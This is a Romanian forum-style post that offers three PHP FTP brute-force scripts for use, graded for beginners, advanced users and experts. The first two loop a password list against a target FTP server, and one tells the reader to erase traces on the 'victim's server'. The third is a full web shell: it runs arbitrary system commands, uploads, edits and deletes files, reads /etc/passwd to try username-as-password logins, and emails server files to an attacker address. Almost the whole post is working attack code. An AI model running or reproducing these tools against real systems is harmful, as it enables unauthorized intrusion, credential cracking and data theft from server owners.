In aceasta sectiune, voi posta 3 coduri de scripturi pe care le puteti folosi pentru brute force Script 1: ( incepatori ) <?php error_reporting(0); $host = $_POST["host"]; $user = $_POST["user"]; $dict = $_POST["dict"]; if (!isset($_POST['submit'])) { echo "<form method=\"post\" action=\"ftpbrute.php\">"; echo "Host: <input type=\"text\" name=\"host\"> "; echo "User: <input type=\"text\" name=\"user\"> "; echo "Wordlist: <input type=\"text\" name=\"dict\"> "; echo "<input type=\"submit\" value=\"Start\" name=\"submit\">"; echo "</form>"; }else{ $file = fopen ($dict, "r"); while (!feof ($file)) { $pass[$i] = fgets($file, 1024); $i++; } fclose($file); $limit = count($pass); $width2 = $limit; echo "[o] Loaded ".$limit." passwords. "; echo "[o] Progress: "; echo "<IMG SRC=\"end.jpg\" WIDTH=\"".$width2."\" HEIGHT=\"10\" \"> "; for ($i=0; $i<$limit; $i++){ $ftp = ftp_connect($host, 21); if(ftp_login($ftp, $user, $pass[$i])){ echo " [o] Success! [o] Username: ".$user." [o] Password:".$pass[$i]." "; }else{ $width = 1; echo "<IMG SRC=\"progress.jpg\" WIDTH=\"".$width."\" HEIGHT=\"10\" \">"; }} ftp_close($ftp); echo " Done."; } ?> Script 2: ( avansati ) <?php error_reporting(E_PARSE); //we want any exception except from WARNING MESSAGES set_time_limit(0); // set the time limit for the script to +oo $passwordfile = "passwd.dic"; //this is the path to the passwordfile $targethost = ""; //change this to the host you want to attack $usrname = "bahoosh"; // change this to the username // of the FTP account you want // to attack $interval = 1; // this is the break the script each time it tries a password // do not set this to zero //change the second arguments you desire $crh = "Sorry, the host you specified cannot be retrieved!"; $cc = "<font color=\"red\">Sorry, I cannot connect to $targethost with [b]$username[/b] and password: $trypassword</font> "; /* DO NOT CHAGE ANYTHING BELOW THIS LINE UNLESS YOU REALLY KNOW WHAT YOU ARE DOING */ if(!file_exists($passwordfile)) { die("Sorry, the passwordfile [b]$passwordfile[/b] cannot be retrieved"); } else { // open connection funtion function openconnection($targethost,$username,$trypassword) { print "<hr>Trying password [b]$trypassword[/b] for [b]".$username."[/b] to $targethost<hr> "; $ftp_conn = @ftp_connect($targethost) or print $crh; if($ftp_conn) { $trylogin = @ftp_login($ftp_conn,$username,$trypassword); if(!$trylogin) { print $cc; } else { print "[b]<font color=\"red\">The password is: $trypassword</font>[/b] "; @ftp_quit($ftp_conn); break; } } } //end of function // try to open the password file $fp = @fopen($passwordfile,"r"); if(!$fp) { die("The password file cannot open"); } else { print "[b]The passwordfile is forked![/b]"; //get the passwords while($trypassword = @fgets($fp,1024)) { openconnection($targethost,$usrname,$trypassword); sleep($interval); } } //...and close the password file or die of errors @fclose($fp) or die("\n \nCannot close the password file!\n"); echo "[b]The password file has closed"; } // when you succeed connecting to your victim's server // do not forget to delete your traces ?> Script 3: ( experti ) <? /* Your eMail for file sending, type your own*/ $demail ="Type your eMail here"; /* config processing */ $title="FTP Brute Force Edited By:Khodavand_Bozorg (NetGaurd Security Corp)"; $ver="1.1"; /* FTP-Brute */ $filename="/etc/passwd"; $ftp_server="localhost"; /* Options done, now designing */ $meta = "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-1251\">"; $style=<<<style <style> { color: #ffffcc; text-decoration:none; font-family: Times New Roman; font-weight: bold; } { color: #FF0000; font-family: Times New Roman; text-decoration: none font-weight: bold; } a { color: #000000; text-decoration:none; font-family: Tahoma; font-size: 11px; } a:hover { color: #184984; font-family: Tahoma; text-decoration: underline font-size: 11px; } td.up{ color: #996600; font-family: Verdana; font-weight: normal; font-size: 11px; } .pagetitle { font-family: Arial, Helvetica, sans-serif; color: #FFFFFF; text-decoration: none; font-size: 12px } .alert { color: #FF0000; font-family: Tahoma; font-size: 11px; } .button1 { font-size:11px; font-weight:bold; font-family:Verdana; background:#184984; border:1px solid #000000; cursor:hand; color:#ffffcc; } .inputbox {font-size:11px; font-family:Verdana, Arial, Helvetica, sans-serif; background:#EBEFF6; color:#213B72; border:1px solid #000000; font-weight:normal} .submit_button { font-family: Arial, Helvetica, sans-serif; font-size: 12px; color: #FFFFFF; background-color: #999999;} .textbox { background: White; border: 1px #000000 solid; color: #000099; font-family: "Courier New", Courier, mono; font-size: 11px; scrollbar-face-color: #CCCCCC; scrollbar-shadow-color: #FFFFFF; scrollbar-highlight-color: #FFFFFF; scrollbar-3dlight-color: #FFFFFF; scrollbar-darkshadow-color: #FFFFFF; scrollbar-track-color: #FFFFFF; scrollbar-arrow-color: #000000 ; border-color: #000000 solid} b { font-weight: bold} table { font-family: Arial, Helvetica, sans-serif; font-size: 11px; color: #184984} </style> style; /* Table styles */ $style1=<<<table STYLE="background:#184984" onmouseover=" = '#D5EBD7'" onmouseout=" = '#184984'" table; $style2=<<<table_file STYLE="background:#184984" onmouseover=" = '#D5EBD7'" onmouseout=" = '#184984'" table_file; $style3=<<<table_dir STYLE="background:#28BECA" onmouseover=" = '#FFFFCC'" onmouseout=" = '#28BECA'" table_dir; $style4=<<<table_files STYLE="background:#DCDCB0" onmouseover=" = '#28BECA'" onmouseout=" = '#DCDCB0'" table_files; $style_button=<<<button STYLE="background:#184984" onmouseover=" = '#D5EBD7'" onmouseout=" = '#184984'" button; $style_open=<<<open STYLE="background:#006200" onmouseover=" = '#006200'" onmouseout=" = '#006200'" open; $style_close=<<<close STYLE="background:#FF0000" onmouseover=" = '#FF0000'" onmouseout=" = '#FF0000'" close; /* Post form */ $form = " <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> <tr> <td align=center class=pagetitle colspan=2>[b]Script help for NetGaurd FTP Brute Force[/b]</font>[/b]</td> <td colspan=2 align=center class=pagetitle>[b]Contact With Javid:[/b]</td> </tr> <tr> <td width='250' class=pagetitle>[b]Name:[/b]</td> <td width='250' class=pagetitle> <input type='text' name='name' size='40' class='inputbox'></td> </tr> <tr> <td width='250' class=pagetitle>[b]Email:[/b]</td> <td width='250'><input type='text' name='email' size='40' class='inputbox'></td> </tr> <tr> <td width=500 colspan=2><textarea rows='4' name='pole' cols='84' class='inputbox' ></textarea></td></tr> <tr> <td align=right><input type='submit' value='Submit' name='B1' class=button1 $style_button></td> <td align=left><input type='reset' value='Reset' name='B2' class=button1 $style_button></td> </tr> </form></table> "; /* HTML form */ $HTML=<<<html <html> <head> <title>$title $ver</title> $meta $style </head> <body bgcolor=#006699 leftmargin=0 topmargin=0 marginwidth=0 marginheight=0> <TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> <tr><td align=center colspan=9 class=pagetitle>[b]NetGaurd FTP Brute Force [/b]ver.<font color=red>$ver</font></td></tr> <tr><td align=center colspan=9 class=pagetitle>Hacking Script...</td></tr> <tr> <td $style2 align=center width='25%' >[url=""].:Javid Blog [/url]</td> <td $style2 align=center width='15%'>[url='$PHP_SELF?action=help'].:About US[/url]</td> <td $style2 align=center width='15%'>[url='$PHP_SELF?action=ftp'].:FTP[/url]</td> <td $style2 align=center width='15%'>[url='$PHP_SELF'].:Home[/url]</td> </tr> </table> html; /* Don't change anything here or the script will be not work*/ global $action,$tm,$cm; function getdir() { global $gdir,$gsub,$i,$j,$REMOTE_ADDR,$PHP_SELF; $st = getcwd(); $st = str_replace("\\","/",$st); $j = 0; $gdir = array(); $gsub = array(); print(" "); for ($i=0;$i<=(strlen($st)-1);$i++) { if ($st[$i] != "/") { $gdir[$j] = $gdir[$j].$st[$i]; $gsub[$j] = $gsub[$j].$st[$i]; } else { $gdir[$j] = $gdir[$j]."/"; $gsub[$j] = $gsub[$j]."/"; $gdir[$j+1] = $gdir[$j]; $j++; } } print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#ffffcc BORDER=1 width=50% align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=left>[b]Current Directory: [/b]"); for ($i = 0;$i<=$j;$i++) print("[url='$PHP_SELF?tm=$gdir[$i]']$gsub[$i][/url]"); $free = tinhbyte(diskfreespace("./")); print("</td></tr><tr><td align=left>[b]Avaible Space on Server[/b] : <font face='Tahoma' size='1' color='#000000'>$free</font></td></tr>"); print("<tr><td align=left>[b] ".exec("uname -a")."[/b]</td></tr>"); print("<tr><td align=left>[b]Your IP:[/b]<font face='Tahoma' size='1' color='#000000'>$REMOTE_ADDR</font></td></tr></table> "); } function tinhbyte($filesize) { if($filesize >= 1073741824) { $filesize = round($filesize / 1073741824 * 100) / 100 . " GB"; } elseif($filesize >= 1048576) { $filesize = round($filesize / 1048576 * 100) / 100 . " MB"; } elseif($filesize >= 1024) { $filesize = round($filesize / 1024 * 100) / 100 . " KB"; } else { $filesize = $filesize . ""; } return $filesize; } function permissions($mode) { $perms = ($mode & 00400) ? "r" : "-"; $perms .= ($mode & 00200) ? "w" : "-"; $perms .= ($mode & 00100) ? "x" : "-"; $perms .= ($mode & 00040) ? "r" : "-"; $perms .= ($mode & 00020) ? "w" : "-"; $perms .= ($mode & 00010) ? "x" : "-"; $perms .= ($mode & 00004) ? "r" : "-"; $perms .= ($mode & 00002) ? "w" : "-"; $perms .= ($mode & 00001) ? "x" : "-"; return $perms; } function readdirdata($dir) { global $action,$files,$dirs,$tm,$supsub,$thum,$style3,$style4,$PHP_SELF; $files = array(); $dirs= array(); $open = @opendir($dir); if (!@readdir($open) or !$open ) echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=alert>[b]No Access.[/b]</td></tr></table>"; else { $open = opendir($dir); while ($file = readdir($open)) { $rec = $file; $file = $dir."/".$file; if (is_file($file)) $files[] = $rec; } sort($files); $open = opendir($dir); $i=0; while ($dire = readdir($open)) { if ( $dire != "." ) { $rec = $dire; $dire = $dir."/".$dire; if (is_dir($dire)) { $dirs[] = $rec; $i++; } } } sort($dirs); print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=760 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td width = '20%' align = 'center' class=pagetitle>[b]Name[/b]</td><td width = '10%' align = 'center' class=pagetitle>[b]Size[/b]</td><td width = '20%' align = 'center' class=pagetitle>[b]Creation Date[/b]</td><td width = '10%' align = 'center' class=pagetitle>[b]Typ[/b]</td><td width = '15%' align = 'center' class=pagetitle>[b]Access Rules[/b]</td><td width = '25%' align = 'center' class=pagetitle>[b]Comments[/b]</td></tr></table>"); for ($i=0;$i<sizeof($dirs);$i++) { if ($dirs[$i] != "..") { $type = 'Dir'; $fullpath = $dir."/".$dirs[$i]; $time = date("d/m/y H:i",filemtime($fullpath)); $perm = permissions(fileperms($fullpath)); $size = tinhbyte(filesize($fullpath)); $name = $dirs[$i]; $fullpath = $tm."/".$dirs[$i]; if ($perm[7] == "w" && $name != "..") $action = " <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#98FAFF width=100% BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> <tr> <td align=center $style3><a href ='$PHP_SELF?tm=$fullpath&action=uploadd'>Upload</a></td> <td align=center $style3><a href ='$PHP_SELF?tm=$tm&dd=$name&action=deldir'>Remove</a></td> </tr> <tr> <td align=center $style3 colspan=2><a href ='$PHP_SELF?tm=$fullpath&action=newdir'>New Directory</a></td> </tr></table>"; else $action = "<TABLE CELLPADDING=0 CELLSPACING=0 width=100% BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center>[b]Read Only[/b]</td><td align=center $style2><a href ='$PHP_SELF?tm=$fullpath&action=arhiv'>Archiv</a></td></tr></table>"; print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#33CCCC BORDER=1 width=760 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td width = '20%' align = 'left'><a href = '$PHP_SELF?tm=$fullpath'>[b][i]$name[/i][/b]</a></td><td width = '10%' align = 'center'>$size</td><td width = '20%' align = 'center'>$time</td><td width = '10%' align = 'center'>$type</td><td width = '15%' align = 'center'>$perm</td><td width = '25%' align = 'left'>$action</td></tr></table>"); } } for ($i=0;$i<sizeof($files);$i++) { $type = 'File'; $fullpath = $dir."/".$files[$i]; $time = date("d/m/y H:i",filemtime($fullpath)); $perm = permissions(fileperms($fullpath)); $size = tinhbyte(filesize($fullpath)); if ( $perm[6] == "r" ) $act = "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#98FAFF width=100% BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center $style4>[url='$PHP_SELF?tm=$dir&fi=$files[$i]&action=view']View[/url]</td><td align=center $style4>[url='$PHP_SELF?tm=$dir&fi=$files[$i]&action=download']Download[/url]</td> <td align=center $style4>[url='$PHP_SELF?tm=$dir&fi=$files[$i]&action=download_mail']Download Mail[/url]</td></tr></table>"; if ( $perm[7] == "w" ) $act .= "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#98FAFF width=100% BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center $style4>[url='$PHP_SELF?tm=$dir&fi=$files[$i]&action=edit']Edit[/url]</td><td align=center $style4>[url='$PHP_SELF?tm=$dir&fi=$files[$i]&action=delete']Delete[/url]</td></tr></table>"; print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#FFFFCC BORDER=1 width=760 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td width = '20%' align = 'left'>[b]$files[$i][/b]</font></td><td width = '10%' align = 'center'>$size</td><td width = '20%' align = 'center'>$time</td><td width = '10%' align = 'center'>$type</td><td width = '15%' align = 'center'>$perm</td><td width = '25%' align = 'center'>$act</td></tr></table>"); } } } function html() { global $ver,$meta,$style; echo " <html> <head> <title>NetGaurd FTP Brute Force</title> </head> <body bgcolor=#86CCFF leftmargin=0 topmargin=0 marginwidth=0 marginheight=0> "; } # View File function viewfile($dir,$file) { $buf = explode(".", $file); $ext = $buf[sizeof($buf)-1]; $ext = strtolower($ext); $dir = str_replace("\\","/",$dir); $fullpath = $dir."/".$file; switch ($ext) { case "jpg": header("Content-type: image/jpeg"); readfile($fullpath); break; case "jpeg": header("Content-type: image/jpeg"); readfile($fullpath); break; case "gif": header("Content-type: image/gif"); readfile($fullpath); break; case "png": header("Content-type: image/png"); readfile($fullpath); break; default: case "avi": header("Content-type: video/avi"); readfile($fullpath); break; default: case "mpeg": header("Content-type: video/mpeg"); readfile($fullpath); break; default: case "mpg": header("Content-type: video/mpg"); readfile($fullpath); break; default: html(); chdir($dir); getdir(); echo " <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center><font color='#FFFFCC' face='Tahoma' size = 2>Way to File:</font><font color=white face ='Tahoma' size = 2>$fullpath</font></td></tr></table>"; $fp = fopen($fullpath , "r"); while (!feof($fp)) { $char = fgetc($fp); $st .= $char; } $st = str_replace("&", "&", $st); $st = str_replace("<", "<", $st); $st = str_replace(">", ">", $st); $tem = "<p align='center'><textarea wrap='off' rows='20' name='S1' cols='90' class=inputbox>$st</textarea></p>"; echo $tem; fclose($fp); break; } } # Send File to Mail function download_mail($dir,$file) { global $action,$tm,$cm,$demail, $REMOTE_ADDR, $HTTP_HOST, $PATH_TRANSLATED; $buf = explode(".", $file); $dir = str_replace("\\","/",$dir); $fullpath = $dir."/".$file; $size = tinhbyte(filesize($fullpath)); $fp = fopen($fullpath, "rb"); while(!feof($fp)) $attachment .= fread($fp, 4096); $attachment = base64_encode($attachment); $subject = "NetGaurd FTP Brute Force ($file)"; $boundary = uniqid("NextPart_"); $headers = "From: $demail\nContent-type: multipart/mixed; boundary=\"$boundary\""; $info = "---==== Mail from ($demail)====---\n\n"; $info .= "IP:\t$REMOTE_ADDR\n"; $info .= "HOST:\t$HTTP_HOST\n"; $info .= "URL:\t$HTTP_REFERER\n"; $info .= "DOC_ROOT:\t$PATH_TRANSLATED\n"; $info .="--$boundary\nContent-type: text/plain; charset=iso-8859-1\nContent-transfer-encoding: 8bit\n\n\n\n--$boundary\nContent-type: application/octet-stream; name=$file \nContent-disposition: inline; filename=$file \nContent-transfer-encoding: base64\n\n$attachment\n\n--$boundary--"; $send_to = "$demail"; $send = mail($send_to, $subject, $info, $headers); if($send == 2) echo " <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> <tr><td align=center> <font color='#FFFFCC' face='Tahoma' size = 2>Thanks!!!File [b]$file[/b] Was sending you to <u>$demail</u>.</font></center></td></tr></table> "; fclose($fp); } # Edit File function editfile($dir,$file) { global $action,$datar; $fullpath = $dir."/".$file; chdir($dir); getdir(); echo " <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Filename :</font><font color = 'black' face ='Tahoma' size = 2>$fullpath</font></center></td></tr></table>"; $fp = fopen($fullpath , "r"); while (!feof($fp)) { $char = fgetc($fp); $st .= $char; } $st = str_replace("&", "&", $st); $st = str_replace("<", "<", $st); $st = str_replace(">", ">", $st); $st = str_replace('"', """, $st); echo "<form method='POST' action='$PHP_SELF?tm=$dir&fi=$file&action=save'><p align='center'><textarea rows='14' name='S1' cols='82' class=inputbox>$st</textarea></p><p align='center'><input type='submit' value='Submit' name='save' class=button1 $style_button></p><input type = hidden value = $tm></form>"; $datar = $S1; } # Save File function savefile($dir,$file) { global $action,$S1,$tm; $fullpath = $dir."/".$file; $fp = fopen($fullpath, "w"); $S1 = stripslashes($S1); fwrite($fp,$S1); fclose($fp); chdir($dir); echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>File [b]$fullpath[/b] Edited.</font></td></tr></table>"; getdir(); readdirdata($tm); } # Delete Directory function deletef($dir) { global $action,$tm,$fi; $tm = str_replace("\\\\","/",$tm); $link = $tm."/".$fi; unlink($link); chdir($tm); getdir(); readdirdata($tm); } # Upload File function uploadtem() { global $file,$tm,$thum,$PHP_SELF,$dir,$style_button; echo " <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><form enctype='multipart/form-data' action='$PHP_SELF?tm=$dir&action=upload' method=post><tr><td align=left valign=top colspan=3 class=pagetitle>[b]Upload File:[/b]</td></tr><tr><td><input type='hidden' name='tm' value='$tm'></td><td><input name='userfile' type='file' size=48 class=inputbox></td><td><input type='submit' value='Upload File' class=button1 $style_button></td></tr></form></table>"; } function upload() { global $HTTP_POST_FILES,$tm; echo $set; copy($HTTP_POST_FILES["userfile"][tmp_name], $tm."/".$HTTP_POST_FILES["userfile"][name]) or die("CanT Upload File".$HTTP_POST_FILES["userfile"][name]); echo " <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>File [b]".$HTTP_POST_FILES["userfile"][name]."[/b] sucessfull uploaded.</font></center></td></tr></table>"; @unlink($userfile); chdir($tm); getdir(); readdirdata($tm); } # Create New Directory function newdir($dir) { global $tm,$nd; print(" <TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><form method = 'post' action = '$PHP_SELF?tm=$tm&action=createdir'><tr><td align=center colspan=2 class=pagetitle>[b]Create Directory:[/b]</td></tr><tr><td valign=top><input type=text name='newd' size=90 class='inputbox'></td><td valign=top><input type=submit value='Create' class=button1 $style_button></td></tr></form></table>"); } function cdir($dir) { global $newd,$tm; $fullpath = $dir."/".$newd; if (file_exists($fullpath)) @rmdir($fullpath); if (@mkdir($fullpath,0777)) { echo " <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Directory created.</font></center></td></tr></table>"; } else { echo " <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Failed To Create Directory.</font></center></td></tr></table>"; } chdir($tm); getdir(); readdirdata($tm); } # Delete Directory function deldir() { global $dd,$tm; $fullpath = $tm."/".$dd; echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Directory Deleted.</font></center></td></tr></table>"; rmdir($fullpath); chdir($tm); getdir(); readdirdata($tm); } # Mail System function mailsystem() { global $status,$form,$action,$name,$email,$pole,$REMOTE_ADDR,$HTTP_REFERER,$DOCUMENT_ROOT,$PATH_TRANSLATED,$HTTP_HOST; if (!isset($status)) echo "$form"; else { $email_to =""; $subject = "NetGaurd FTP Brute Force ($name)"; $headers = "From: $email"; $info = "---==== Mail from ($name)====---\n\n"; $info .= "Name:\t$name\n"; $info .= "Email:\t$email\n"; $info .= "What?:\n\t$pole\n\n"; $info .= "IP:\t$REMOTE_ADDR\n"; $info .= "HOST:\t$HTTP_HOST\n"; $info .= "URL:\t$HTTP_REFERER\n"; $info .= "DOC_ROOT:\t$PATH_TRANSLATED\n"; $send_to = "$email_to"; $send = mail($send_to, $subject, $info, $headers); if($send == 2) echo " <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Thanks!!!Your mail was send.</font></center></td></tr></table> "; } } # Help function help() { global $action,$REMOTE_ADDR,$HTTP_REFERER; echo " <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> <tr><td align=center class=pagetitle>[b]About NetGaurd FTP Brute Force Script[/b]</font>[/b]</td></tr> <tr><td bgcolor=#FFFFCC> [b]NetGaurd FTP Brute Force[/b] - Script For All NetGaurd Full Access Members Team</font> To This Script Was Added This Menu for Version 1.1 : - FTP bruteforce (Behrooz_Ice) [b]NetGaurd FTP Brute Force - Script For All NetGaurd Full Access Members Team. Dont Give to Other People.[/b] [b]Find Us:[/b] Site Adress: [url][/url] See Ya!!! </td></tr></table> "; } # FTP-Brute function ftp() { global $action, $ftp_server, $filename, $HTTP_HOST; echo " <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle>FTP-server: [b]$ftp_server[/b]</td></tr>"; $fpip = @fopen ($filename, "r"); if ($fpip) { while (!feof ($fpip)) { $buf = fgets($fpip, 100); ereg("^([0-9a-zA-Z]{1,})\:",$buf,$g); $conn_id=ftp_connect($ftp_server); if (($conn_id) && (@ftp_login($conn_id, $g[1], $g[1]))) { $f=@fopen($HTTP_HOST,"a+"); fputs($f,"$g[1]:$g[1]\n"); echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle>[b]Connected with login:password - ".$g[1].":".$g[1]."[/b]</td></tr></table>"; ftp_close($conn_id); fclose($f); } else { echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#FFFFCC BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center>".$g[1].":".$g[1]." - [b]failed[/b]</td></tr></table>"; } } } } function ashiyane_copyright() { global $action,$upass,$uname,$nfm; return " <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#ffffcc BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#000000' face='Tahoma' size = 2>[b]Powered by NetGaurd Security Corp (author Khodavand_Bozorg) Special Thanks to Lucifer & Q7x < Made In IRan >[/b]</font></center></td></tr></table></body></html>"; } /* main() */ set_time_limit(0); if ( $action !="download") print("$HTML"); if (!isset($cm)) { if (!isset($action)) { if (!isset($tm)) { $tm = getcwd(); } $curdir = getcwd(); if (!@chdir($tm)) exit(" <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=alert>No Access To The Directory, Look CHMOD.</td></tr></table>"); getdir(); chdir($curdir); $supsub = $gdir[$j-1]; if (!isset($tm) ) { $tm=getcwd();} readdirdata($tm); } else { switch ($action) { case "view": viewfile($tm,$fi); break; case "delete": echo " <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>File [b]$fi[/b] Sucessfull Deleted.</font></center></td></tr></table>"; deletef($tm); break; case "download": if (isset($fatt) && strlen($fatt)>0) { $attach=$fatt; header("Content-type: text/plain"); } else { $attach=$fi; header("Content-type: Haji"); } header("Content-disposition: attachment; filename=\"$attach\";"); readfile($tm."/".$fi); break; case "download_mail": download_mail($tm,$fi); break; case "edit": editfile($tm,$fi); break; case "save": savefile($tm,$fi); break; case "uploadd": uploadtem(); break; case "up": up($tm); break; case "newdir": newdir($tm); break; case "createdir": cdir($tm); break; case "deldir": deldir(); break; case "upload": upload(); break; case "help": help(); break; case "ftp": ftp(); break; case "passwd": passwd(); break; } } } else { echo " <table CELLPADDING=0 CELLSPACING=0 bgcolor=#FFFFFF BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center>Finished: $cm</center><pre>"; echo system($cm); echo "</pre></td></tr></table>"; } if ( $action !="download") echo ashiyane_copyright(); ?> succes! sper sa va ajute la ceva